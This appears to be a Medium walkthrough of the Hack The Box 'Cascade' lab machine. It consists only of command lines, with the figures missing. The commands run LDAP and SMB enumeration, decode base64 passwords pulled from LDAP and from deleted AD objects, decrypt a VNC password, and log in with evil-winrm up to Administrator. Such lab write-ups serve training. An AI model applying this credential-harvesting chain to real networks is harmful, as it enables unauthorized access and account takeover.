Cascade Machine

  • sC: To scan with default Nmap scripts.
  • sV (Version detection)
  • oA: To write the output file in the three major formats at once.
#Command: 
$ nmap -sC -sV -oA nmap 10.10.10.182
Figure: 1
#Command: 
$ ldapsearch -x -h 10.10.10.119 -p 389 -s base namingcontexts
#Command: 
$ Ldapsearch -LLL -x -H ldap://10.10.10.182 -x -b ‘DC=CASCADE,DC=LOCAL' > ldap.out
Figure: 2
#Command: 
$ cat ldap-anonymous.out | fgrep -i pwd
Figure: 3
#Command: 
$ echo -n clk0bjVldmE= | base64 -d
Figure: 4
Figure: 5
#Command: 
$ smbclient -U r.thompson -L 10.10.10.182
Figure: 6
#Command: 
$ smbclient \\\\10.10.10.182\\Data - U r.thompson
Figure: 7
#Command: 
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
Figure: 8
#Command: 
$ cat 'VNC Install.reg'
Figure: 9
#Command: 
$ vncpwd.exe 6bcf2a4b6e5aca0f
Figure: 10
#Command: 
$ evil-winrm -i 10.10.10.182 -u s.smith
Figure: 11
#Command: 
$ smbclient -U s.smith -L 10.10.10.182
Figure: 12
#Command: 
$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith
Figure: 13
#Command: 
$ python -m SimpleHTTPServer 8000
Figure: 14
Figure: 15
Figure: 15
Figure: 17
Figure: 18
Figure: 19
Figure: 20
#Command: 
$ evil-winrm -i 10.10.10.182 -u ArkSvc
Figure: 21
Figure: 22
Figure: 23
#Command: 
> Get-ADObject -SearchbBase "CN=Deleted Object,DC=cascade,DC=local" -ldapfilter "(objectClass=*)" -includeDeletedObjects | Format-List Name,ObjectClass,ObjectGuid
Figure: 24
#Command: 
> get-adobject -IncludeDeletedObjects -filter ‘objectclass -eq “user”-AND IsDeleted -eq $True’ -properties cascadeLegacyPwd
Figure: 25
#Command: 
$ echo -n YmFDVDNyMWFOMDBkbGVz | base64 -d
Figure: 26
#Command: 
$ evil-winrm -i 10.10.10.182 -u Administrator
Figure: 27

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
cY83rR0H1t

cY83rR0H1t

82 Followers

MSc CyberSecurity |Cybersecurity researcher | OSCP | CRTP |eCPPTv2 | eJPT |CEHv10 | Hack The Box player | CTF player |